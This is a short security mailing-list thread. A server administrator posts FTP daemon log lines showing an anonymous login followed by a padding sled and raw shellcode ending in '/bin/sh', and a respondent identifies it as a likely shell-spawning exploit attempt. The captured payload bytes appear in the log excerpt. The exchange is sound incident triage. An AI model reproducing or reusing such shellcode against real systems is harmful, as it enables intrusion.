Luis José Fabbiani B. (SOPORTE) wrote:
Hi, my server had registry de following entry:
Jan 11 06:02:36 cumana in.ftpd[23016]: connect from pedro@150.185.69.34 Jan 11 06:02:36 cumana ftpd[23016]: connection from complex.ciens.ucv.ve Jan 11 06:02:37 cumana ftpd[23016]: ANONYMOUS FTP LOGIN FROM complex.ciens.ucv.ve ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P1Ŕ1Ű1É°FÍ~@1Ŕ1ŰC~IŮA°?Í~@ëk^1Ŕ1É~M^^A~HF^Dfš˙^A°'Í~@1Ŕ~M^^ A°=Í~@1Ŕ1Ű~M^^H~IC^B1ÉţÉ1Ŕ~M^^H°^LÍ~@ţÉuó1Ŕ~HF^I~M^^H°=Í~@ţ^N°0ţČ~HF^D1Ŕ~HF^ G~Iv^H~IF^L~Ió~MN^H~MV^L°^KÍ~@1Ŕ1Ű°^AÍ~@č~P˙˙˙0bin0sh1..11
Is this message a possible attack?
Thanks.
Luis.
--------------------------------------------------------------------- To unsubscribe, e-mail: suse-security-unsubscribe@suse.com For additional commands, e-mail: suse-security-help@suse.com
Yes... Or somebody wanted You to be scared or sth Anyway there is /bin/sh string visible in the last line - a sign that this probably was exec(/bin/sh) try... Grzegorz Prokopski PS: Anyway You should check consistiecy of your filesystem after all... and logs. But probably somebody tryed to use exploit for another ftp daemon than Yours (or older version of it). Else he probably wouldn't leave the logs.